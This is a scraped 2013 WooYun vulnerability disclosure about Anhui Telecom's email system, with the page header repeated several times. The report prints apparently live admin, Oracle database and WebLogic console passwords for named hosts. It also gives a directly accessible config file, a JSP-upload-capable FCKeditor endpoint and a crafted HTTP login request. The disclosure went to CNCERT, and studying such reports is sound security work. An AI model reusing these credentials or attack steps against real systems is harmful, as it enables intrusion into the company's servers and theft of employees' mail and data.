安徽省电信总公司邮箱系统脆弱点(包含全省员工邮箱密码哈希)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-044478

漏洞标题：安徽省电信总公司邮箱系统脆弱点(包含全省员工邮箱密码哈希)

漏洞作者： hacker@sina.cn

提交时间：2013-11-30 09:33

修复时间：2014-01-14 09:34

公开时间：2014-01-14 09:34

漏洞类型：服务弱口令

危害等级：低

自评Rank：1

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-11-30：细节已通知厂商并且等待厂商处理中
2013-12-02：厂商已经确认，细节仅向厂商公开
2013-12-12：细节向核心白帽子及相关领域专家公开
2013-12-22：细节向普通白帽子公开
2014-01-01：细节向实习白帽子公开
2014-01-14：细节向公众公开

简要描述：

这次是今年的了，来个不痛不痒的。

详细说明：

没有目的性的检测，只是不小心发现了而已，用的应该是eyou的产品，wooyun里太多相关漏洞贴了不细说请搜索.
历史信息(这个弱口令20131130测试被修复了，当初是这个进去导出的用户信息)：
http://mail.anhuitelecom.com/admin/ admin/aaaaa
数据库文件直接访问：
http://mail.anhuitelecom.com/include/config.inc
爆了个路径：/data1/eyou/htdocs/php/report/monitor/view_agent.php
呵呵呵，至于说这个邮箱登录，默认页面被他们删除了？我猜测应该是用了SSO，所以登录页面被他们删了。
去网上找了eyou的站抓包分析好歹算是搞出了登录办法。

邮箱登录代码:
浏览器访问http://mail.anhuitelecom.com/remote.php，使用burpsuite截断，修改第二个包内容为如下提交即可。
POST /cgi-bin/user_login HTTP/1.1
Host: mail.anhuitelecom.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html, */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://mail.anhuitelecom.com/remote.php
Content-Length: 62
Cookie: USER=SKIN=current&
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
LoginName=帐号&domain=anhuitelecom.com&Password=密码&skin=

------------------------------------------------------------
这次再附赠你们一个漏洞点：
http://202.102.221.31/fckeditor 有FCK可上传JSP
路径：/opt/webtool/appdeploy/AHCTZP/

jdbc:oracle:thin:@134.64.209.70:1521:mssdb1
AHCTZP
iesK8Jl3b

Weblogic这个有点意思，这么多年一直搞的3DES，这次玩了下AES，老外写的代码果然可以用，嗯，nice.
http://202.102.221.31/console/login/LoginForm.jsp
username=weblogic
password=Ahdxsgs@2011

漏洞证明：

修复方案：

以上信息未擅自传播，所以请批量更新修改密码即可，麻烦了。

版权声明：转载请注明来源 hacker@sina.cn@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2013-12-02 22:00

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT直接通报中国电信集团公司，由其后续派发工单给省公司处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-044478

漏洞标题：安徽省电信总公司邮箱系统脆弱点(包含全省员工邮箱密码哈希)

相关厂商：中国电信

漏洞作者： hacker@sina.cn

提交时间：2013-11-30 09:33

修复时间：2014-01-14 09:34

公开时间：2014-01-14 09:34

漏洞类型：服务弱口令

危害等级：低

自评Rank：1

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 hacker@sina.cn@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-044478

漏洞标题：安徽省电信总公司邮箱系统脆弱点(包含全省员工邮箱密码哈希)

相关厂商：中国电信

漏洞作者： hacker@sina.cn

提交时间：2013-11-30 09:33

修复时间：2014-01-14 09:34

公开时间：2014-01-14 09:34

漏洞类型：服务弱口令

危害等级：低

自评Rank：1

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-044478"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 hacker@sina.cn@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：